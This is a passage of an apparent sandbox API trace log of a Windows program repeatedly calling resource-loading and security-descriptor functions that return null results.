dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.840] LockResource (hResData=0x0) returned 0x0 [0219.840] FreeResource (hResData=0x0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.840] LockResource (hResData=0x0) returned 0x0 [0219.840] FreeResource (hResData=0x0) returned 0 [0219.840] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.840] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.840] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.840] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.840] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.841] LockResource (hResData=0x0) returned 0x0 [0219.841] FreeResource (hResData=0x0) returned 0 [0219.841] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.841] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.841] LockResource (hResData=0x0) returned 0x0 [0219.841] FreeResource (hResData=0x0) returned 0 [0219.841] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.841] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.841] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.841] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.841] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.841] LockResource (hResData=0x0) returned 0x0 [0219.841] FreeResource (hResData=0x0) returned 0 [0219.841] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.841] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.841] LockResource (hResData=0x0) returned 0x0 [0219.841] FreeResource (hResData=0x0) returned 0 [0219.841] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.841] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.841] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.841] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.841] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.841] LockResource (hResData=0x0) returned 0x0 [0219.841] FreeResource (hResData=0x0) returned 0 [0219.841] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.841] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.841] LockResource (hResData=0x0) returned 0x0 [0219.841] FreeResource (hResData=0x0) returned 0 [0219.841] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.841] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.841] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.841] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.841] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.842] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.842] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.842] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.842] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.842] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.842] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.842] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.842] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.842] LockResource (hResData=0x0) returned 0x0 [0219.842] FreeResource (hResData=0x0) returned 0 [0219.842] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.842] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.843] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.843] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.843] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.843] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.843] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.843] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.843] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.843] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.843] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.843] LockResource (hResData=0x0) returned 0x0 [0219.843] FreeResource (hResData=0x0) returned 0 [0219.843] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.843] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.844] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.844] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.844] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.844] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.844] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.844] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.844] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.844] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.844] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.844] LockResource (hResData=0x0) returned 0x0 [0219.844] FreeResource (hResData=0x0) returned 0 [0219.844] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.844] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.845] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.845] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.845] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.845] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.845] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.845] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.845] LockResource (hResData=0x0) returned 0x0 [0219.845] FreeResource (hResData=0x0) returned 0 [0219.845] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.845] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.845] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.845] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.845] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.846] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.846] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.846] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.846] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.846] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.846] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.846] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.846] LockResource (hResData=0x0) returned 0x0 [0219.846] FreeResource (hResData=0x0) returned 0 [0219.846] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.846] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.846] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.846] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.847] LockResource (hResData=0x0) returned 0x0 [0219.847] FreeResource (hResData=0x0) returned 0 [0219.847] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.847] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.847] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.847] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.847] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 